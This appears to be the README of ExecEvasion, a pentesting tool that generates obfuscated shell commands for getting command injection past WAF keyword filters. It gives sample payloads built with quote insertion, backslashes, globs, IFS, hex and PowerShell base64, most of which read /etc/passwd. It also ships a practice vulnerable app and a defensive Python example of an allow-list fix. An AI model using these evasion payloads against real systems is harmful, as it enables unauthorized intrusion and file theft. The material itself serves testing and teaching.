When `cat /etc/passwd` gets blocked, but `c''at /e''tc/pa''sswd` doesn't.
A command obfuscation toolkit for pentesters, bug bounty hunters, CTF players, and anyone who's ever been frustrated by a WAF.
You found a command injection. Nice. You try to read /etc/passwd. Blocked. You try whoami. Blocked. The WAF is doing its job.
But here's the thing — shells are weird. They do strange things with quotes, backslashes, and variables. And most filters don't account for that.
ExecEvasion generates 50+ obfuscated versions of your command using 18 different techniques. One of them will probably work.
No npm. No pip. No docker. Just open index.html in your browser. That's it.
This is also live at https://dr34mhacks.github.io/ExecEvasion/
Enter a command. Get variations like:
```bash
# Original
cat /etc/passwd

# What ExecEvasion generates
c'a't /etc/passwd            # Quote insertion
c\at /etc/passwd             # Backslash escape
c[a]t /etc/passwd            # Glob pattern
c$@at /etc/passwd            # Variable expansion
a=cat;b=/etc/passwd;$a $b    # Command split into variables then expanded
```

All of these execute `cat /etc/passwd`. Most filters only catch the first one.
| Technique | Example | When to use |
|---|---|---|
| Glob Patterns | `c[a]t` | Keyword blacklists |
| Quote Insertion | `c''a''t` | Simple string matching |
| Backslash Escape | `c\a\t` | Regex-based filters |
| Variable Expansion | `c$@at` | When $ isn't blocked |
| Concatenation | `a=c;b=at;$a$b` | Multi-command allowed |
| Hex | `$'\x63\x61\x74'` | When nothing else works |
| Wildcards | `/e*/passwd` | Path blacklists |
| Brace Expansion | `{cat,/etc/passwd}` | Space filters |
| IFS | `cat${IFS}/etc/passwd` | Space blocked |

| Technique | Example | When to use |
|---|---|---|
| Caret Escape | `w^h^o^a^m^i` | CMD keyword filters |
| Quotes | `who""ami` | Simple matching |
| Env Substrings | `%COMSPEC:~0,1%` | Build from nothing |
| PowerShell Base64 | `powershell -e <b64>` | Heavy filtering |
| Char Codes | `[char[]](119,104,111)` | String blocked |
Testing a target that blocks cat, passwd, and etc? Enter them in the blocked strings field. ExecEvasion marks which payloads avoid those strings.
No more guessing.
I included a vulnerable web app so you can practice:
```bash
cd challenge
pip install flask
python app.py
# Open http://127.0.0.1:5000
```

It's a "secure" ping utility with WAF protection. Your job: read /tmp/flag.txt.
The filter blocks the obvious stuff. Use ExecEvasion to find what works.
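
Why a keyword blacklist in front of a ping utility like this fails, and what replaces it, as an added example (not the challenge app's code or the project's). The blocked keywords, function names and sample list are assumptions; the command strings are the ones quoted on this page.

```python
import ipaddress
import shlex

# Hypothetical keyword blacklist; the challenge app's real rules are not shown on this page.
BLOCKED = ("cat", "passwd", "whoami", "/etc")

# Constructed samples: a benign host plus command strings quoted on this page.
SAMPLES = ["127.0.0.1", "cat /etc/passwd", "c''at /e''tc/pa''sswd", r"c\at /etc/passwd"]


def blacklist_allows(raw: str) -> bool:
    """Signature filter: substring match on the raw request value."""
    return not any(word in raw for word in BLOCKED)


def shell_words(raw: str) -> list[str]:
    """Words after POSIX quote and backslash removal, as sh would see them.
    shlex performs no glob, variable, brace or $'..' expansion."""
    return shlex.split(raw)


def normalized_hits(raw: str) -> list[str]:
    """Detection aid: blocked keywords visible only after quote removal."""
    joined = " ".join(shell_words(raw))
    return [w for w in BLOCKED if w in joined and w not in raw]


def safe_ping_argv(host: str) -> list[str]:
    """Allow-list fix: accept only a literal IP address and return an argv
    list for subprocess.run(argv) with no shell involved."""
    addr = ipaddress.ip_address(host.strip())  # ValueError on anything else
    return ["ping", "-c", "1", str(addr)]


def accepted_by_allowlist(host: str) -> bool:
    try:
        safe_ping_argv(host)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:28} blacklist={blacklist_allows(s)!s:5} "
              f"hidden={normalized_hits(s)} allowlist={accepted_by_allowlist(s)}")
```

Normalizing before matching only recovers the quote and backslash variants; the glob, variable and hex forms in the table still differ from the keyword after `shlex`, which is why the allow-list plus an argv list is the fix rather than a better signature.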
- Bug Bounty Hunters — That RCE you found is useless if you can't prove impact. Bypass the filter, read the file, write the report.
- Pentesters — Client has a WAF? Good. Now show them why signature-based blocking isn't enough.
- CTF Players — Stop manually trying quote variations. Generate them all. Find what works. Get the flag.
- Security Researchers — Study how different obfuscation techniques evade different filter types.
- Red Teamers — Test detection capabilities. See what their SOC catches and what slips through.
The docs.html page explains why each technique works:
- How shell parsing differs from filter parsing
- When specific techniques succeed or fail
- ASCII/hex reference tables
- Troubleshooting common issues
Understanding the "why" helps you adapt when pre-built payloads don't work.
```
ExecEvasion/
├── index.html      # Main generator (just open this)
├── docs.html       # Technical documentation
├── challenge/      # Practice vulnerable app
│   ├── app.py
│   └── README.md
├── LICENSE
└── README.md
```
This tool is for:
- Authorized penetration testing
- Bug bounty programs (with scope permission)
- CTF competitions
- Security research
- Educational purposes
Using this against systems you don't have permission to test is illegal. Don't be that person.
Built by Sid Joshi
If this helped you pop a shell or find a bug, consider starring the repo.
"The best filter bypass is the one the filter author didn't think of."